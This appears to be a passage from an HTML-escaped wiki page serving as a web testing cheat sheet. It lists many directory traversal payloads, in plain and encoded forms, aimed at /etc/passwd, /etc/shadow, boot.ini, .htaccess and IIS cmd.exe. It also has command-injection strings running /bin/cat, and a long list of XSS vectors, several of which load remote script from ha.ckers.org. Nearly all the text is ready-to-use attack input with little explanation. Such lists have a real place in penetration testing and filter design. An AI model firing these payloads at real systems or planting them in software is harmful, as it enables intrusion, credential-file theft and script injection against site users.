..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
